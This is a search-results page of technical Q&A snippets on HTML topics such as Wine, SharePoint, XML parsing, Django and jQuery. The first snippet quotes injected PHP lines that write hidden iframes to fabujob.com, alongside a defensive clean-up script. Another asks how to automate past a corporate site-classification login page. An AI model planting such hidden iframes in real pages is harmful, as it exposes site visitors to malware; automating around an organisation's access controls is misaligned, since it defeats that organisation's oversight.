Search Results

Search found 45245 results on 1810 pages for 'html content extraction'.


  • Search for index.php and index.html and replace string

    - by Jonas
    Hello. I recently had some sort of malware on my computer that appended the following string(s) to every index.php and index.html ON THE WEBSERVER: echo "<iframe src=\"http://fabujob.com/?click=AD4A4\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; echo "<iframe src=\"http://fabujob.com/?click=AC785\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; The parameter after "click=" always changes; these two are only examples. Is there a way to search and replace these quickly across all files? EDIT: It is on my webserver, so no use of find...
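
    One possible clean-up approach (not from the original thread, just a sketch): a small Python script that walks the web root and strips the injected lines. The web root path and the exact iframe pattern are assumptions to adapt, and backing up the files first is strongly advised.

        import os
        import re

        WEB_ROOT = "/var/www"  # assumption: adjust to the real document root

        # Matches the injected echo "<iframe src=\"http://fabujob.com/?click=...\" ...></iframe>";
        # lines, whatever the value after click= happens to be.
        PATTERN = re.compile(
            r'echo\s+"<iframe src=\\"http://fabujob\.com/\?click=[^\\"]*\\"[^>]*></iframe>";\s*'
        )

        for dirpath, _, filenames in os.walk(WEB_ROOT):
            for name in filenames:
                if name not in ("index.php", "index.html"):
                    continue
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="ignore") as f:
                    original = f.read()
                cleaned = PATTERN.sub("", original)
                if cleaned != original:
                    with open(path, "w", encoding="utf-8") as f:
                        f.write(cleaned)
                    print("cleaned", path)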

    Read the article

  • WINEHQ - wine_gecko won't init - HTML Rendering disabled

    - by Nick
    Hello Super Users, I'm currently trying to get a Windows-compiled program to run on Linux and Mac OS X through Wine. When I run the program through Wine, it prompts me to install Gecko, which I do. Later on, the program attempts to use MSHTML to render HTML, but I get these error messages on my console instead: err:mshtml:init_xpcom NS_InitXPCOM2 failed: 80004005 err:mshtml:HTMLDocument_Create Failed to init Gecko, returning CLASS_E_CLASSNOTAVAILABLE fixme:ole:CoCreateInstance no instance created for interface {00000000-0000-0000-c000-000000000046} of class {25336920-03f9-11cf-8fd0-00aa00686f13}, hres is 0x80040111 I'm using Wine 1.1.34, and a similar bug was supposedly fixed in 1.1.33: http://bugs.winehq.org/show_bug.cgi?id=12578 I've been at this all afternoon; is there anything I'm missing? Thanks, Nick

    Read the article

  • Firefox: Load local html file when opening new tab

    - by user81430
    A couple of months ago, I configured Firefox to load a local HTML file containing my commonly-used links whenever I open a new tab. This week I've been trying to find where I set this up, but I cannot find the setting anywhere in the Firefox options. Somewhere there is (or was) a dialog box with an item that said something like 'Page to load in new tab'. Where was it? Could Mozilla have removed it in the latest upgrade? I'm not using any extensions except LastPass, so it's not controlled by an extension.

    Read the article

  • SharePoint Server 2007 and HTML Forms - How to control access rights

    - by Anarkie
    I'm working with hosted SharePoint 2007 with Forms Server. I need to allow clients to submit HTML forms designed in InfoPath. The problem is, I need to make sure the clients don't see the library, since sensitive data will be on these forms. I also need a repeated library that is based on the Internal Admin records and requirements. Outside of making a separate library per customer, does anyone have any suggestions? My goal: 1: Customers enter their requests through a link or provided page. 2: Internally address the requests and perform the required arrangements, adding billing and payment fields. 3: Have SharePoint metrics, reports, etc. based on the provided information and status. Thanks in advance!!

    Read the article

  • Circumventing a manual HTML login page for "unclassified" websites

    - by auramo
    The IT department just made my life a little bit harder again: they introduced a manual HTML login page for all websites they have not "classified". This means that applications which try to access unclassified websites, e.g. to download plugins, do not work. Examples: Eclipse plugin installation, Maven builds, etc. What would be the easiest workaround for this? The best I've come up with is to try to extend/customize Ruby's httpproxy.rb that comes with WEBrick, automating the manual login whenever that login response page is detected. This sounds quite painful, and I think there might (or should) be simpler options?
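
    A possible simplification, purely an assumption and not something from the thread: if the gateway whitelists a client after one successful form POST, a small Python helper can perform the login before the real tools run. The URL, marker text and form field names below are placeholders that have to be read off the actual login page.

        import requests

        # Placeholders: inspect the real interception page to fill these in.
        LOGIN_URL = "https://gateway.example.com/login"
        LOGIN_MARKER = "This site has not been classified"
        CREDENTIALS = {"username": "me", "password": "secret", "accept": "yes"}

        session = requests.Session()

        def fetch(url):
            """GET a URL, auto-submitting the gateway login form if intercepted."""
            resp = session.get(url)
            if LOGIN_MARKER in resp.text:
                # We were served the manual login page: post the form, then retry.
                session.post(LOGIN_URL, data=CREDENTIALS)
                resp = session.get(url)
            return resp

        print(fetch("http://repo1.maven.org/maven2/").status_code)

    If the tools have to go through a local proxy instead, this detect-and-post step is essentially what a customized httpproxy.rb would do on their behalf.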

    Read the article

  • Extended search and replace in an HTML file

    - by Fake4d
    I have a little question. I have a big HTML file and want to replace lots of things inside it, many times over. The only problem I can't solve is a replace with a variable part. Example: <image src="start_files\0002.jpg" style="width:216pt; height:162"> should be transformed into <a href="start_files\0002.jpg" target="_blank"><image src="start_files\0002.jpg" style="width:216pt; height:162"></a> Do you have an idea how to do it? I have a Windows system with Notepad2 and Notepad++, and I could install a new tool if needed (like a Windows port of sed). The best solution would be a batch solution where I can add other transformations. Hope you have got good ideas! Thanks in advance, Fake4d
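
    For reference, a minimal Python sketch of the backreference replace (the file names are placeholders); sed or Notepad++'s regular-expression replace can do the same thing with backreferences, and the script can grow extra re.sub calls for other transformations.

        import re

        with open("start.html", encoding="utf-8") as f:
            html = f.read()

        # Group 1 is the whole original <image ...> tag, group 2 is its src value.
        wrapped = re.sub(
            r'(<image src="([^"]+)"[^>]*>)',
            r'<a href="\2" target="_blank">\1</a>',
            html,
        )

        with open("start_wrapped.html", "w", encoding="utf-8") as f:
            f.write(wrapped)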

    Read the article

  • "Content is not allowed in prolog" when parsing perfectly valid XML on GAE

    - by Adrian Petrescu
    Hey guys, I've been beating my head against this absolutely infuriating bug for the last 48 hours, so I thought I'd finally throw in the towel and try asking here before I throw my laptop out the window. I'm trying to parse the response XML from a call I made to AWS SimpleDB. The response is coming back on the wire just fine; for example, it may look like: <?xml version="1.0" encoding="utf-8"?> <ListDomainsResponse xmlns="http://sdb.amazonaws.com/doc/2009-04-15/"> <ListDomainsResult> <DomainName>Audio</DomainName> <DomainName>Course</DomainName> <DomainName>DocumentContents</DomainName> <DomainName>LectureSet</DomainName> <DomainName>MetaData</DomainName> <DomainName>Professors</DomainName> <DomainName>Tag</DomainName> </ListDomainsResult> <ResponseMetadata> <RequestId>42330b4a-e134-6aec-e62a-5869ac2b4575</RequestId> <BoxUsage>0.0000071759</BoxUsage> </ResponseMetadata> </ListDomainsResponse> I pass in this XML to a parser with XMLEventReader eventReader = xmlInputFactory.createXMLEventReader(response.getContent()); and call eventReader.nextEvent(); a bunch of times to get the data I want. Here's the bizarre part -- it works great inside the local server. The response comes in, I parse it, everyone's happy. The problem is that when I deploy the code to Google App Engine, the outgoing request still works, and the response XML seems 100% identical and correct to me, but the response fails to parse with the following exception: com.amazonaws.http.HttpClient handleResponse: Unable to unmarshall response (ParseError at [row,col]:[1,1] Message: Content is not allowed in prolog.): <?xml version="1.0" encoding="utf-8"?> <ListDomainsResponse xmlns="http://sdb.amazonaws.com/doc/2009-04-15/"><ListDomainsResult><DomainName>Audio</DomainName><DomainName>Course</DomainName><DomainName>DocumentContents</DomainName><DomainName>LectureSet</DomainName><DomainName>MetaData</DomainName><DomainName>Professors</DomainName><DomainName>Tag</DomainName></ListDomainsResult><ResponseMetadata><RequestId>42330b4a-e134-6aec-e62a-5869ac2b4575</RequestId><BoxUsage>0.0000071759</BoxUsage></ResponseMetadata></ListDomainsResponse> javax.xml.stream.XMLStreamException: ParseError at [row,col]:[1,1] Message: Content is not allowed in prolog. at com.sun.org.apache.xerces.internal.impl.XMLStreamReaderImpl.next(Unknown Source) at com.sun.xml.internal.stream.XMLEventReaderImpl.nextEvent(Unknown Source) at com.amazonaws.transform.StaxUnmarshallerContext.nextEvent(StaxUnmarshallerContext.java:153) ... (rest of lines omitted) I have double, triple, quadruple checked this XML for 'invisible characters' or non-UTF8 encoded characters, etc. I looked at it byte-by-byte in an array for byte-order-marks or something of that nature. Nothing; it passes every validation test I could throw at it. Even stranger, it happens if I use a Saxon-based parser as well -- but ONLY on GAE, it always works fine in my local environment. It makes it very hard to trace the code for problems when I can only run the debugger on an environment that works perfectly (I haven't found any good way to remotely debug on GAE). Nevertheless, using the primitive means I have, I've tried a million approaches including: XML with and without the prolog With and without newlines With and without the "encoding=" attribute in the prolog Both newline styles With and without the chunking information present in the HTTP stream And I've tried most of these in multiple combinations where it made sense they would interact -- nothing! I'm at my wit's end. 
Has anyone seen an issue like this before, or can anyone shed some light on it? Thanks!
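
    A hedged aside, not from the original post: "Content is not allowed in prolog" usually means the parser saw bytes before <?xml, such as a BOM, leading whitespace, or stray chunk-framing bytes. The original code is Java on GAE; this Python sketch only illustrates the clean-up step of stripping such bytes before parsing.

        import codecs
        import xml.etree.ElementTree as ET

        def parse_clean(raw_bytes):
            """Drop a UTF-8 BOM and leading whitespace, then parse the XML."""
            if raw_bytes.startswith(codecs.BOM_UTF8):
                raw_bytes = raw_bytes[len(codecs.BOM_UTF8):]
            return ET.fromstring(raw_bytes.lstrip())

        doc = parse_clean(b'\xef\xbb\xbf<?xml version="1.0"?><ListDomainsResponse/>')
        print(doc.tag)  # ListDomainsResponse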

    Read the article

  • How to notify client about updated UpdatePanel content on server side

    - by csh1981
    I have a problem with UpdatePanel.Update(), which works initially but then stops. I have struggled with this problem for some time and some background is needed, so please read ahead. I have an ASP.NET application in which I have a subpage that displays computed information in graphs. Each graph is embedded in an UpdatePanel. The graph is a user control that uses the standard asp:Chart for display. My task is to enable this page with AJAX capabilities so the page is responsive during postbacks. When I access this page from another page, during the initial page rendering, I use a wait dialog for each graph and a pageload event on the client side. In the client event, a hidden button is clicked which a server event handles (the hidden button is inside an UpdatePanel so the postback is asynchronous). Each graph is computed and the UpdatePanels are in turn updated with the Chart content. This is done using UpdatePanel.Update, and it is successful. However, I also have some RadioButtons on the page. These are dynamically created. Their purpose is to switch graph type, that is, to show the same data in a different way. The same kind of time-consuming computation is needed in order to do so. I subscribe to each RadioButton's OnCheckedChanged event, and the postback is asynchronous since the radio buttons are inside an UpdatePanel. In the server event handler I determine the type of graph and use this as an input to the Chart control. I then remove the old Chart control from my Panel, add a new Chart, and then call UpdatePanel.Update(). But with no success. Nothing happens, no errors, nothing. Why is this? I think this is strange because if I compute every Chart's data in the initial rendering instead of using the "wait dialog" solution described earlier, then I can select graph types successfully and all subsequent AJAX requests work as intended. Also, the same code (computing the chart, removal, and adding the Chart control to the Panel and UpdatePanel.Update()) is hit during the initial rendering of the page, and it works only the first time. Here is the method that computes the graph, adds it to the panel and updates the UpdatePanel:
    public void UpdateGraph(GraphType type, GraphMapper mapper)
    {
        // Panel is the content of UpdatePanelGraph
        Panel.Controls.Clear();
        chart = new Chart(type, mapper); // Computation happens inside here
        panel.Controls.Add(chart);
        // UpdatePanelGraph is in UpdateMode Conditional and has ChildrenAsTriggers set to false
        UpdatePanelGraph.Update();
    }
    I really need a way for these radio buttons to work, possibly using some client-side JavaScript or another way of handling things on the server side. I have thought about using a JavaScript postback call on the UpdatePanel instead of UpdatePanel.Update(). However, the issue I have here is how to notify the client side when the server side is finished computing the graph. A plausible explanation of the strange behavior is also much appreciated. Any help appreciated, thanks

    Read the article

  • Showing updated content on the client

    - by tazim
    Hi, I have a file on the server which is viewed by the client asynchronously as and when required. The file is going to get modified on the server side, and the updates should be reflected in the browser as well. In my views.py the code is: def showfiledata(request): somecommand = "ls -l > /home/tazim/webexample/templates/tmp.txt" with open("/home/tazim/webexample/templates/tmp.txt") as f: read_data = f.read() f.closed return_dict = {'filedata': read_data} json = simplejson.dumps(return_dict) return HttpResponse(json, mimetype="application/json") Here, the entire file is sent every time the client requests the file data. Instead, I want only the modified data to be received, since sending the entire file is not feasible if the file size is large. My template code is: <html> <head> <script type="text/javascript" src="/jquerycall/"></script> <script type="text/javascript"> $(document).ready(function() { var setid = 0; var s = new String(); var my_array = new Array(); function displayfile() { $.ajax({ type:"POST", url:"/showfiledata/", datatype:"json", success:function(data) { s = data.filedata; my_array = s.split("\n"); displaydata(my_array); } }); } function displaydata(my_array) { var i = 0; length = my_array.length; for(i=0;i<my_array.length;i++) { var line = my_array[i] + "\n"; $("#textid").append(line); } } $("#b1").click(function() { setid = setInterval(displayfile,1000); }); $("#b2").click(function() { clearInterval(setid); }) }); </script> </head> <body> <form method="post"> <button type="button" id="b1">Click Me</button><br><br> <button type="button" id="b2">Stop</button><br><br> <textarea id="textid" rows="25" cols="70" readonly="true" disabled="true"></textarea> </form> </body> </html> Any help will be beneficial; some sample code would help me understand.
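
    A minimal sketch of one way to send only the appended data (an assumption about the intent, not code from the thread): have the client echo back the byte offset it has already received and return just what was written after it. The file path and view name follow the question; the offset handling is the new part.

        import json
        import os

        from django.http import HttpResponse

        LOG_PATH = "/home/tazim/webexample/templates/tmp.txt"

        def showfiledata(request):
            # The client POSTs the offset it has already consumed (0 on the first call).
            offset = int(request.POST.get("offset", 0))
            size = os.path.getsize(LOG_PATH)
            if offset > size:
                offset = 0  # file was truncated or rewritten, so start over
            with open(LOG_PATH, "rb") as f:
                f.seek(offset)
                new_bytes = f.read()
            payload = {"filedata": new_bytes.decode("utf-8", "replace"),
                       "offset": offset + len(new_bytes)}
            # mimetype matches the question's Django version; newer Django uses content_type.
            return HttpResponse(json.dumps(payload), mimetype="application/json")

    On the client side, the success callback would store data.offset, append only data.filedata to the textarea, and send the stored offset back as POST data on the next poll.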

    Read the article

  • How to Load In Content with jQuery?

    - by ClarkSKent
    Hello, I am trying to add ajax functionality to my pagination so the content loads in the same page instead of the user having to navigate to another page when clicking the page links. I should mention that I am using this php pagination class. Being new to jquery, I am unsure of how to properly do this with the pagination class. This is what the main page looks like: <?php $categoryId=$_GET['category']; echo $categoryId; ?> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script> <script type="text/javascript" src="jquery_page.js"></script> <?php //Include the PS_Pagination class include('ps_pagination.php'); //Connect to mysql db $conn = mysql_connect('localhost', 'root', 'root'); mysql_select_db('ajax_demo',$conn); $sql = "select * from explore where category='$categoryId'"; //Create a PS_Pagination object $pager = new PS_Pagination($conn, $sql, 3, 11, 'param1=value1&param2=value2'); //The paginate() function returns a mysql //result set for the current page $rs = $pager->paginate(); //Loop through the result set echo "<table width='800px'>"; while($row = mysql_fetch_assoc($rs)) { echo "<tr>"; echo"<td>"; echo $row['id']; echo"</td>"; echo"<td>"; echo $row['site_description']; echo"</td>"; echo"<td>"; echo $row['site_price']; echo"</td>"; echo "</tr>"; } echo "</table>"; echo "<ul id='pagination'>"; echo "<li>"; //Display the navigation echo $pager->renderFullNav(); echo "</li>"; echo "</ul>"; ?> <div id="loading" ></div> <div id="content" ></div> <a href="#" class="category" id="marketing">Marketing</a> <a href="#" class="category" id="automotive">Automotive</a> <a href="#" class="category" id="sports">Sports</a> Any help on this would be great. Thanks.

    Read the article

  • Single page not appearing in Google Search

    - by Dan
    Description I have a static franchise website which has various sub pages, each dedicated to an individual franchisee. For the franchisee pages, the only thing even slightly similar between all of them is the page title; they follow this structure: <title> Welcome to THE_COMPANY - PRODUCT_DESCRIPTION Services, THE_LOCATION </title> THE_COMPANY and PRODUCT_DESCRIPTION are the same across all franchisees, however THE_LOCATION changes depending on where they are located in the UK. Each franchisee page has the following <meta /> tags: <meta name="DC.creator" content="user"/> <meta name="DC.format" content="text/html"/> <meta name="DC.language" content="en"/> <meta name="DC.date.modified" content="2014-01-23T11:22:31+00:00"/> <meta name="DC.date.created" content="2014-01-23T11:22:09+00:00"/> <meta name="DC.type" content="Page"/> <meta name="DC.distribution" content="Global"/> <meta name="robots" content="ALL"/> <meta name="distribution" content="Global"/> The main content on each franchisee page is completely different. The Problem There is one particular franchisee page, located in Area A, which will not appear in Google Search results at all. However, every single other franchisee (if you Google search for "THE_COMPANY, THE_LOCATION") is number 1. And if I do the same search on Bing, Yahoo or DuckDuckGo, the Area A franchisee is the first result on all of them. Has Google for some reason blacklisted one page on the site? What I Have Tried Ensuring the page is referenced in my sitemap.xml file 'Fetching as Googlebot' the link www.the_company.co.uk/areaa When that came back as OK I would submit to index Resubmitting the sitemap.xml file in Webmaster Tools Linking to the Area A page from another page's content For this I also waited about 3 weeks before checking again to give Google time to re-index Making a change to the page content and waiting another 2 / 3 weeks Removing the page completely and recreating it with an alternative URL The closest thing I have found to this issue is this StackOverflow question, but this particular franchisee has existed for almost a year; it used to appear in Google searches but no longer does. I'm guessing the Panda update wasn't too happy with something on the page, but it hasn't affected anything else on the site and I am at a loss for things to try. I would greatly appreciate any information or thoughts as to what could have caused this. Thanks. Update In line with Daniel Fukuda's answer below, I have followed some of his steps but everything seems to check out alright: HTTP Headers HTTP/1.1 200 OK => Date => Tue, 25 Feb 2014 16:31:29 GMT Server => Zope/(2.12.16, python 2.6.6, linux2) ZServer/1.1 Content-Length => 40078 Expires => Sat, 01 Jan 2000 00:00:00 GMT Content-Type => text/html;charset=utf-8 Content-Language => en Vary => Accept-Encoding Connection => close Robots <meta /> tag: <meta name="robots" content="ALL"/> I have updated this <meta /> tag to read content="INDEX" instead now. robots.txt: User-agent: * Disallow: User-Agent: Googlebot Disallow: /*sendto_form$ Disallow: /*folder_factories$ Using site:THE_COMPANY.co.uk: Searching for 'AREA A site:THE_COMPANY.co.uk' does not return the page, but regardless of that, searching just for site:THE_COMPANY.co.uk will not necessarily return every indexed page, or so I understand... Update It appears Google likes to drop pages from the index every now and then; despite my steps above, I simply left the site alone and the page appeared back in the SERPs by itself.

    Read the article

  • ASP.NET MVC Html.DropDownListFor Select value

    - by user295541
    Hi, I have a little problem. I use the Html.DropDownListFor helper to render a dropdown list to the client, but I can't set the selected value in the dropdown list. <%= Html.DropDownListFor(model => Model.CalculationClassCollection, new SelectList(Model.CalculationClassCollection, "ID", "Name", 3), new { id = "ddCalculationClass" }) %> Can anybody help me?

    Read the article

  • Html editor (WYSIWYG) for WinForms (C#)

    - by Raf
    Hi, As in the question: do you know any good (ideally free) WYSIWYG HTML editor for WinForms (C#)? There is only one requirement: it has to be managed code only (by this I mean it can't use the mshtml COM object, i.e. the WebBrowser control). I've found this: http://www.modeltext.com/html/ but there is no download/buy option. I will be really thankful for any answer.

    Read the article

  • Add onblur event to ASP.Net MVC's Html.TextBox

    - by justSteve
    What's the correct syntax for an HTML helper (in MVC2) to define an onblur handler where the textbox is generated with code like: <%= Html.TextBox( "ChooseOptions.AddCount" + order.ID, (order.Count > 0) ? AddCount.ToString() : "", new { @class = "{number: true} small-input" } ) %> thx

    Read the article

  • Can I use Html Agility Pack for this?

    - by chobo2
    Hi, I could not find any tutorials on their site. I am wondering: can I use Html Agility Pack to parse a string? Say I have string = "<b>Some code</b>"; could I use Agility Pack to get rid of the <b> tags? All the examples I have seen so far load full HTML documents.

    Read the article

  • HTML text editor in ASP.NET 2.0

    - by Sachin Gaur
    I am developing a web application where the user has the option to send email to other users. I am looking for any built-in HTML text editor for ASP.NET 2.0. I know the latest AJAX release for .NET 3.5 provides this control; I am looking for a similar control but for ASP.NET 2.0. Is there any other UI control, built using JavaScript or jQuery, that can be used to allow the user to enter an HTML-formatted message?

    Read the article

  • How to update multiple elements with one MooTools Request.HTML call

    - by Mario
    Does anyone know if, using one Request.HTML call from MooTools, it is possible to somehow update more than one element in a webpage? The current call I have is: var req = new Request.HTML({update: $('content')}).get('../latest_events'); This updates the content div in my page with the "../latest_events" page. Is there a way to update other divs with the "../latest_events" page using this same call, or do I have to just use separate calls?

    Read the article

  • Why Basic HTML gets loaded

    - by Priyanka
    Hello... When I browse the internet, only basic HTML gets loaded on my computer. For example, for the Orkut or Facebook login, only the text box appears, and when inputs are provided and redirection is done, it says "error on page". Even on Google search, basic HTML gets loaded on my computer. I tried installing a new Internet Explorer version, i.e. IE8, but the same problem remains. Kindly provide a good solution to this problem.

    Read the article

  • Render ASP in pages with .html extension in Windows CE

    - by Chris
    I want to be able to use the .html extension to render ASP pages. I am using Windows CE 6 at the moment with the default web server, and ASP is turned on. I have attempted to add a "ScriptMap" entry under the HKEY_LOCAL_MACHINE\COMM\HTTPD\ScriptMap subkey with the value ".html"="\Windows\asp.dll", but this doesn't seem to work. What am I doing wrong?

    Read the article

  • html editor properties

    - by Ranjana
    I have used the HTML editor on my page: <%@ Register Assembly="AjaxControlToolkit" Namespace="AjaxControlToolkit.HTMLEditor" TagPrefix="cc1" %> I send the values to the database as txtjobdesc.Content.ToString(). If I type just a paragraph in the editor, it displays the same description. But if I use any bullets or highlighted words, it is displayed as words above the bulleted words. How do I make it display as an HTML description? Please help me out.

    Read the article

  • HTML Comment-out Add-In

    - by Velika
    Here is an old add-in to quickly comment out HTML code. Maybe I am missing it, but it seems like there is a shortcut in VS2010 to scratch your tail with one click, yet commenting out HTML code is still awkward as hell. What's the easiest way to get a function like this working? Can I expect add-ins that were written for older versions of VS to work in VS2010 without an upgrade?

    Read the article
